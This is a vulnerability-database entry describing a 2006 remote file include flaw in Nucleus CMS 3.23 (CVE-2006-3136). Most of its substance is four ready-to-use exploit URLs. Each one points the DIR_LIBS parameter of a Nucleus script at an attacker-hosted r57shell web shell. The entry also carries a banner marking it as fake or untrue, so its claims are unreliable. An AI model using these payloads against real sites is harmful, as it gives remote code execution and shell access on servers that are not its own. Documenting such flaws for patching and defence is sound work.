file include exploits in nucleus 3.23

WARNING! Fake news / Uwaga! Nota nieprawdziwa

file include exploits in nucleus 3.23

2006.06.23

Credit: gamr-14 hotmail com

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-3136

CWE: CWE-94

Ogólna skala CVSS: 7.5/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

Multiple file include exploits in nucleus 3.23

script type : nucleus 3.23

bug found by : sweet-devil

team : site-down

type : file include

####################################################

exploits :

action.php

http://www.example.com/path/action.php?DIR_LIBS=http://yoursite/r57shell
.txt?

media.php

http://www.example.com/path/nucleus/media.php?DIR_LIBS=http://yoursite/r
57shell.txt?

server.php

http://www.example.com/path/nucleus/xmlrpc/server.php?DIR_LIBS=http://yo
ursite/r57shell.txt?

api_metaweblog.inc.php

http://www.example.com/path/nucleus/xmlrpc/api_metaweblog.inc.php?DIR_LI
BS=http://yoursite/r57shell.txt?

####################################################

#######################

emails:

gamr-14 (at) hotmail (dot) com [email concealed]  &  black-cod3 (at) hotmail (dot) com [email concealed]

#######################

All my respect to our friends , lezr.com

done .. peace

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

file include exploits in nucleus 3.23

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.